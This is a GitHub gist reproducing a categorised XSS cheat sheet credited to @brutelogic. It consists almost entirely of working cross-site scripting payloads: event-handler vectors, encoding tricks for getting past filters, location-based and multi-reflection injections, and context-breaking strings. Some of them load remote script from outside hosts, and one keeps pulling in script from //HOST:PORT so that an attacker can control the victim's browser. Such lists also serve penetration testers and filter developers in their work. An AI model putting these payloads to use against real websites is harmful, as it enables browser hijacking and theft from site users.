Skip to content

Instantly share code, notes, and snippets.

@EnchantedGuardian

EnchantedGuardian/brutelogic.md

Forked from toufik-airane/brutelogic.md
Created April 6, 2017 03:34
Show Gist options
  • Save EnchantedGuardian/42051970545c8909911a97c7814a93c8 to your computer and use it in GitHub Desktop.
Save EnchantedGuardian/42051970545c8909911a97c7814a93c8 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
brutelogic.md

Credit: @brutelogic (blog)

Summary

The XSS payloads and schemes used in all posts for a quick reference.

XSS Payload Scheme

extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3

Agnostic Event Handlers

<brute contenteditable onblur=alert(1)>lose focus!

<brute onclick=alert(1)>click this!

<brute oncopy=alert(1)>copy this!

<brute oncontextmenu=alert(1)>right click this!

<brute oncut=alert(1)>copy this!

<brute ondblclick=alert(1)>double click this!

<brute ondrag=alert(1)>drag this!

<brute contenteditable onfocus=alert(1)>focus this!

<brute contenteditable oninput=alert(1)>input here!

<brute contenteditable onkeydown=alert(1)>press any key!

<brute contenteditable onkeypress=alert(1)>press any key!

<brute contenteditable onkeyup=alert(1)>press any key!

<brute onmousedown=alert(1)>click this!

<brute onmousemove=alert(1)>hover this!

<brute onmouseout=alert(1)>hover this!

<brute onmouseover=alert(1)>hover this!

<brute onmouseup=alert(1)>click this!

<brute contenteditable onpaste=alert(1)>paste here!

<brute style=font-size:500px onmouseover=alert(1)>0000

Existing Code Reuse

<script>alert(1)//

<script>alert(1)<!–

<script src=//brutelogic.com.br/1>

<script src=//3237054390/1>

Filter Bypass Procedure

<x onxxx=1

%3Cx onxxx=1

<%78 onxxx=1

<x %6Fnxxx=1

<x o%6Exxx=1

<x on%78xx=1

<x onxxx%3D1

<X onxxx=1

<x ONxxx=1

<x OnXxx=1

<X OnXxx=1

<x onxxx=1 onxxx=1

<x/onxxx=1

<x%09onxxx=1

<x%0Aonxxx=1

<x%0Conxxx=1

<x%0Donxxx=1

<x%2Fonxxx=1

<x 1=‘1’onxxx=1

<x 1=“1”onxxx=1

<x </onxxx=1

<x 1=“>” onxxx=1

<http://onxxx%3D1/

<x%2F1=“>%22OnXxx%3D1

Probing to Find XSS

param1=1<1&param2=2<1&param3=3<1

Location Based Payloads – Part I

<svg/onload=location=‘javascript:alert(1)’>

<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)

<svg/onload=location=‘javas’%2B‘cript:’%2B‘ale’%2B‘rt’%2Blocation.hash.substr(1)>#(1)

<svg/onload=location=/javas/.source%2B/cript:/.source%2B
/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)

<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source
%2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()

Location Based Payloads – Part II

<svg onload=alert(tagName)>

<javascript onclick=alert(tagName)>click me!

<javascript onclick=alert(tagName%2Blocation.hash)>click me!#:alert(1)

<javascript: onclick=alert(tagName%2Blocation.hash)>click me!#alert(1)

<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)

<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)

<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>’click me!#’-alert(1)

<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>
’click me!</javascript:>#’-alert(1)

Location Based Payloads – Part III

<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:/*click me!#*/alert(9)

<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:’click me!#’-alert(9)

<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)

<javascript:”-‘ onclick=location=tagName%2bURL>click me!#’-alert(1)

<j onclick=location=innerHTML%2bURL>javascript:”-‘click me!</j>#’-alert(1)

<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)

<javas onclick=location=tagName%2binnerHTML%2bURL>cript:”-‘click me!</javas>#’-alert(1)

<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)

“-alert(1)<javascript:” onclick=location=tagName%2bpreviousSibling.nodeValue>click me!

“-alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:”click me!

<alert(1)<!– onclick=location=innerHTML%2bouterHTML>javascript:1/*click me!*/</alert(1)<!–>

<j 1=”*/””-alert(1)<!– onclick=location=innerHTML%2bouterHTML>javascript:/*click me!

*/”<j”-alert(1)<!– onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!

*/”<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!

<j onclick=location=innerHTML>javascript%26colon;alert(1)//

<iframe id=t:alert(1) name=javascrip onload=location=name%2bid>

<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>

<svg id=?p=<script/src=//3237054390/1%2B onload=location=id>

<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>

<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!

<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>

%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!

Location Based Payloads – Part IV

protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3

Source-Breaking Injections

“onafterscriptexecute=alert(1) 1=’

“onbeforescriptexecute=alert(1) 1=’

Using XSS to Control a Browser

<svg onload=setInterval(function(){d=document;
z=d.createElement(“script”);z.src=”//HOST:PORT”;
d.body.appendChild(z)},0)>

Multi Reflection XSS

<svg onload=write(1)>

p=’onload=alert(1)><svg/1=’

p=’>alert(1)</script><script/1=’

p=*/alert(1)</script><script>/*

p=*/alert(1)”>’onload=”/*<svg/1=’

p=`-alert(1)”>’onload=”`<svg/1=’

p=*/</script>’>alert(1)/*<script/1=’

p=<svg/1=’&q=’onload=alert(1)>

p=<svg 1=’&q=’onload=’/*&r=*/alert(1)’>

p=-alert(1)}//\

p=\&q=-alert(1)//

XSS Without Event Handlers

<script>alert(1)</script>

<script src=javascript:alert(1)>

<iframe src=javascript:alert(1)>

<embed src=javascript:alert(1)>

<a href=javascript:alert(1)>click

<math><brute href=javascript:alert(1)>click

<isindex action=javascript:alert(1) type=submit value=click>

<form><button formaction=javascript:alert(1)>click

<form><input formaction=javascript:alert(1) type=submit value=click>

<form><input formaction=javascript:alert(1) type=image value=click>

<form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>

<isindex formaction=javascript:alert(1) type=submit value=click>

<object data=javascript:alert(1)>

<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>

<svg><script xlink:href=data:,alert(1)></script>

<svg><script xlink:href=data:,alert(1) />

<math><brute xlink:href=javascript:alert(1)>click

<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 />
<animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>

Transcending Context-Based Filters

<math><!–” href=javascript:alert(1)//

” href=javascript:alert(1) <math><!–

lol video<!–“href=javascript:alert(1) style=font-size:50px;
display:block;color:transparent;
background:url(‘//brutelogic.com.br/webgun/img/youtube1.jpg’);
background-repeat:no-repeat –><math><!–

<svg><!–‘-alert(1)-‘

‘-alert(1)-‘<svg><!–
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment